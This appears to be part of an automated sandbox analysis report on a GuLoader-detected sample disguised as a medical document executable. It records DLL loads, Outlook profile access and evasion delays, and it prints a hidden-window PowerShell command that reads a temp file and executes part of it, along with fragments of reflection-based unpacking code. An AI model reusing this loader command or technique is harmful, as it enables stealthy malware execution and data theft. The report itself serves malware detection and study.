          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Binary string: tem.Core.pdb7 source: powershell.exe, 00000002.00000002.2242741038.0000000007667000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2242741038.0000000007647000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000002.00000002.2242741038.0000000007647000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: qm.Core.pdbn3 source: powershell.exe, 00000002.00000002.2242741038.0000000007667000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000002.00000002.2247218971.000000000925B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Ropp $Tyranniseret $Slibrigheders), (Lovlydige @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Brakpljede = [AppDomain]::CurrentDomain.GetAssemblies()$glob
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Bedewed)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Paasejlede, $false).DefineType($Nubbling, $Rrelse
          Suspicious powershell command line found
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) "
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) "Jump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03A647EE push ss; iretd 10_2_03A647F1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03A64650 push esp; retf 10_2_03A64655
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03A61F02 push ebp; retf 10_2_03A61F03
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_03A66C38 push edx; iretd 10_2_03A66C39
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren\Apixaban - August 2024.exeJump to dropped file
          Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 4591165
          Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 2510000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 251E0000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 250A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599890Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599671Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599558Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599437Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599326Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599215Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599105Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598929Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598812Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598702Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598578Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598468Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598359Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598250Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598138Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598015Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597905Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597796Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597656Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597544Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597422Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597312Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597199Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597078Jump to behavior
